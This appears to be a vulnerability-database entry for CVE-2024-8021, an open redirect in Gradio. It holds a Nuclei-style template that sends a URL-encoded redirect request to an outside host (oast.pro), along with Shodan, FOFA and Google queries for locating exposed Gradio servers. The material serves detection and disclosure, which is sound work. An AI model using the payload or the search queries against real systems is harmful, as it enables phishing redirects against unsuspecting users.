漏洞描述
Gradio allows an open redirect bypass via URL encoding, enabling attackers to redirect users to malicious sites. This can lead to phishing attacks and loss of trust in the application.
CVE-2024-8021: Gradio - Open Redirect
PoC代码[已公开]
id: CVE-2024-8021
info:
name: Gradio - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
Gradio allows an open redirect bypass via URL encoding, enabling attackers to redirect users to malicious sites. This can lead to phishing attacks and loss of trust in the application.
reference:
- https://huntr.com/bounties/adc23067-ec04-47ef-9265-afd452071888
classification:
epss-score: 0.01516
epss-percentile: 0.80581
metadata:
verified: true
max-request: 1
vendor: gradio_project
product: gradio
shodan-query:
- http.html:"__gradio_mode__"
- http.title:"gradio"
fofa-query:
- body="__gradio_mode__"
- title="gradio"
google-query: intitle:"gradio"
tags: cve,cve2024,redirect,oast,gradio
http:
- raw:
- |
GET /file=http%3A%2F%2Foast.pro/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
part: header
- type: status
status:
- 302
# digest: 490a00463044022022c853c15559f0c0b2b21a5c9584d7889ea4c4e0902842bd4649c6f8b5364fca022071b9c7deefb26746ce3aa75efa259e3a7b49e25e052ff33ed237df8288fe90a0:922c64590222798bb761d5b6d8e72950